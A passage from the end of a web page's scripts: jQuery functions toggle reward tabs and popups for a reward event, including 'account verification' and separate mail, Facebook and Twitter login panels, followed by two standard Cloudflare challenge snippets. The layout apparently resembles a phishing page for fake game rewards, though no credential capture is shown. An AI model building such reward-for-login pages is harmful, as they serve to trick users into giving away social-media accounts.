                        tab_rewards[i].style.display = "none";
                    }
                    tab_rewards_link = document.getElementsByClassName("menu-content");
                    for (i = 0; i < tab_rewards_link.length; i++) {
                        tab_rewards_link[i].className = tab_rewards_link[i].className.replace(" menu-content-active", "");
                    }
                    document.getElementById(rewardsClass).style.display = "block";
                    evt.currentTarget.className += " menu-content-active";
                }
                document.getElementById("defaultTabRewards").click();

                // code for showing hiding popup
                function open_newhome() {
                    $('.account_login').show();
                    $('.newhome').hide();
                }

                function open_mail_login() {
                    $('.login-mail').show()
                    $('.account_login').hide();
                }

                function close_mail_login() {
                    $('.login-mail').hide()
                    $('.account_login').show();
                }

                function open_about_event() {
                    $('.about_event').show();
                }

                function open_event_rules() {
                    $('.event_rules').show();
                }

                function open_verification() {
                    $('.account_verification').show();
                    $(".open_rewards").hide()
                    $(".otherReward_confirmation").hide()
                    $(".itemReward_confirmation").hide()
                }

                function open_itemReward_confirmation(ag) {
                    var itemReward_confirmationImg = $(ag).attr("src");
                    $('.itemReward_confirmation').show();
                    $('#myItemReward_confirmationImg').attr('src', itemReward_confirmationImg);
                }

                function open_otherReward_confirmation(ag) {
                    var otherReward_confirmationImg = $(ag).attr("src");
                    var otherReward_confirmationValue = $(ag).attr("value");
                    $('.otherReward_confirmation').show();
                    $('#myOtherReward_confirmationImg').attr('src', otherReward_confirmationImg);
                    $('#otherReward_confirmationValue').html(otherReward_confirmationValue);
                }

                function close_reward_confirmation() {
                    $(".itemReward_confirmation").hide()
                    $(".otherReward_confirmation").hide()
                }

                function close_reward_confirmations() {
                    $('.event_rules').hide();
                    $('.about_event').hide();
                }

                function open_facebook() {
                    $('.login-facebook').show();
                    $('.account_login').hide();
                }

                function open_twitter() {
                    $('.login-twitter').show();
                    $('.account_login').hide();
                }

                function close_facebook() {
                    $('.login-facebook').hide()
                    $('.account_login').show();
                }

                function close_twitter() {
                    $('.login-twitter').hide()
                    $('.account_login').show();
                }

                function open_newhome() {
                    $('.account_login').show();
                    $('.newhome').hide();
                }

                function open_account_login() {
                    $('.account_login').show();
                    $('.itemReward_confirmation').hide();
                }
            </script>
            <script>
                (function() {
                    if (!document.body) return;
                    var js = "window['__CF$cv$params']={r:'86b627066ef4831e',t:'MTcxMTYxMzUxOC4xNTMwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";
                    var _0xh = document.createElement('iframe');
                    _0xh.height = 1;
                    _0xh.width = 1;
                    _0xh.style.position = 'absolute';
                    _0xh.style.top = 0;
                    _0xh.style.left = 0;
                    _0xh.style.border = 'none';
                    _0xh.style.visibility = 'hidden';
                    document.body.appendChild(_0xh);

                    function handler() {
                        var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;
                        if (_0xi) {
                            var _0xj = _0xi.createElement('script');
                            _0xj.innerHTML = js;
                            _0xi.getElementsByTagName('head')[0].appendChild(_0xj);
                        }
                    }
                    if (document.readyState !== 'loading') {
                        handler();
                    } else if (window.addEventListener) {
                        document.addEventListener('DOMContentLoaded', handler);
                    } else {
                        var prev = document.onreadystatechange || function() {};
                        document.onreadystatechange = function(e) {
                            prev(e);
                            if (document.readyState !== 'loading') {
                                document.onreadystatechange = prev;
                                handler();
                            }
                        };
                    }
                })();
            </script>
            <script>
                (function() {
                    if (!document.body) return;
                    var js = "window['__CF$cv$params']={r:'88b5678eadc74080',t:'MTcxNjk3NDM4Ny42NDcwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";
                    var _0xh = document.createElement('iframe');
                    _0xh.height = 1;
                    _0xh.width = 1;
                    _0xh.style.position = 'absolute';
                    _0xh.style.top = 0;
                    _0xh.style.left = 0;
                    _0xh.style.border = 'none';
                    _0xh.style.visibility = 'hidden';
                    document.body.appendChild(_0xh);

                    function handler() {
                        var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;
                        if (_0xi) {
                            var _0xj = _0xi.createElement('script');
                            _0xj.innerHTML = js;
                            _0xi.getElementsByTagName('head')[0].appendChild(_0xj);
                        }
                    }
                    if (document.readyState !== 'loading') {
                        handler();
                    } else if (window.addEventListener) {
                        document.addEventListener('DOMContentLoaded', handler);
                    } else {
                        var prev = document.onreadystatechange || function() {};
                        document.onreadystatechange = function(e) {
                            prev(e);
                            if (document.readyState !== 'loading') {
                                document.onreadystatechange = prev;
                                handler();
                            }
                        };
                    }
                })();
            </script>
</body>

</html>